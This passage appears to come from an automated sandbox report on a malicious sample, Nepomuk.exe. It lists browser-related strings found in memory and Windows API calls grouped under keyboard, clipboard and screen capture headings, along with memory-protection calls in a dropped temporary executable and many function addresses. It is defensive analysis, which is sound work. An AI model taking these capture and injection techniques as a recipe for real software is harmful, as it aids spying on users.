                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchIn
putHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_0358D210 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,0_2_0358D210

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchIn
putHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_015B0000 NtAllocateVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_015B0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Code function: 7_2_018D0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_018D0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Code function: 10_2_032C0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_032C0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Code function: 13_2_012E0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,13_2_012E0000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610: CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchI
nputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNativ0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584B5B0_2_01584B5B
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158BB600_2_0158BB60
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157DB300_2_0157DB30
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01571B3D0_2_01571B3D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155BBC00_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01576BC00_2_01576BC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01583BC40_2_01583BC4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584BC60_2_01584BC6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01583BC20_2_01583BC2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01590BE00_2_01590BE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156CBBA0_2_0156CBBA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01569AE20_2_01569AE2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01585AE00_2_01585AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01559AB00_2_01559AB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155FAA00_2_0155FAA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01557D500_2_01557D50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01552D500_2_01552D50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158ED440_2_0158ED44
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155ADD00_2_0155ADD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156BDF30_2_0156BDF3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156DDE00_2_0156DDE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159AC500_2_0159AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155CC400_2_0155CC40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157FC7D0_2_0157FC7D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01598C600_2_01598C60
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01556C000_2_01556C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01591C000_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584C050_2_01584C05
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01560CC00_2_01560CC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157CC900_2_0157CC90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156AF560_2_0156AF56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015A2F590_2_015A2F59
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01573F610_2_01573F61
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015A0F010_2_015A0F01
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01560F0A0_2_01560F0A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01588F250_2_01588F25
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157EFE00_2_0157EFE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01555E560_2_01555E56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01569E150_2_01569E15
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01587E380_2_01587E38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01595E200_2_01595E20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01562EE30_2_01562EE3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158BE800_2_0158BE80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158FEB00_2_0158FEB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035953500_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355E3400_2_0355E340
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355B3100_2_0355B310
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357EBD00_2_0357EBD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356ABFA0_2_0356ABFA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035663900_2_03566390
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356527E0_2_0356527E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359D2D00_2_0359D2D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03561AF80_2_03561AF8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03597A810_2_03597A81
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035841D10_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A1DB0_2_0356A1DB
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035629E40_2_035629E4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035700500_2_03570050
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359B8500_2_0359B850
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355D8400_2_0355D840
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359800F0_2_0359800F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357B0000_2_0357B000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356003D0_2_0356003D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359D0F00_2_0359D0F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357E7300_2_0357E730
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035917E00_2_035917E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359CD100_2_0359CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03576DD00_2_03576DD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03560D880_2_03560D88
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035914600_2_03591460
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359C4E00_2_0359C4E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035963500_2_03596350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035903410_2_03590341
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356B36A0_2_0356B36A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03571B100_2_03571B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357BB000_2_0357BB00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03589B250_2_03589B25
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355D3D00_2_0355D3D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035643F90_2_035643F9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03573BE00_2_03573BE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357FBE00_2_0357FBE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359AB800_2_0359AB80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356F3B00_2_0356F3B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03556A560_2_03556A56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035522500_2_03552250
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035542520_2_03554252
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A2660_2_0356A266
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035932690_2_03593269
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035732100_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03588A380_2_03588A38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03596A200_2_03596A20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03598AEA0_2_03598AEA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03563AE30_2_03563AE3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A2960_2_0356A296
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358CA800_2_0358CA80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03590AB00_2_03590AB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035589500_2_03558950
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355C1500_2_0355C150
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035539500_2_03553950
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358615F0_2_0358615F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358F9440_2_0358F944
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035721100_2_03572110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356B9250_2_0356B925
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355B9D00_2_0355B9D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356D9F50_2_0356D9F5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356C9F30_2_0356C9F3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356E9E00_2_0356E9E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359A9E00_2_0359A9E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357F8550_2_0357F855
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035998600_2_03599860
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358081C0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035578000_2_03557800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035988010_2_03598801
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035928000_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035760300_2_03576030
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035740E50_2_035740E5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359C0E00_2_0359C0E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357D8900_2_0357D890
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359A8B00_2_0359A8B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035990A00_2_035990A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03598F400_2_03598F40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358AF700_2_0358AF70
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358C7600_2_0358C760
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03562F100_2_03562F10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03580F080_2_03580F08
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356DF0E0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356CFD50_2_0356CFD5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355C7C00_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035777C00_2_035777C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03552FB00_2_03552FB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357B7B00_2_0357B7B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035816500_2_03581650
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03553E100_2_03553E10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355BE100_2_0355BE10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03558ED00_2_03558ED0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03565EC20_2_03565EC2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035866E00_2_035866E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357FE840_2_0357FE84
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03592E800_2_03592E80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355A6B00_2_0355A6B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035606A00_2_035606A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035626A00_2_035626A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03577EA00_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035615560_2_03561556
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356CD5F0_2_0356CD5F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035755700_2_03575570
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358CD100_2_0358CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03599D100_2_03599D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03590D100_2_03590D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035925100_2_03592510
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359BD000_2_0359BD00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035745300_2_03574530
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358A5CD0_2_0358A5CD
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356D5F00_2_0356D5F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355F5B00_2_0355F5B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356C5A10_2_0356C5A1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358AC500_2_0358AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035994000_2_03599400
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359AC300_2_0359AC30
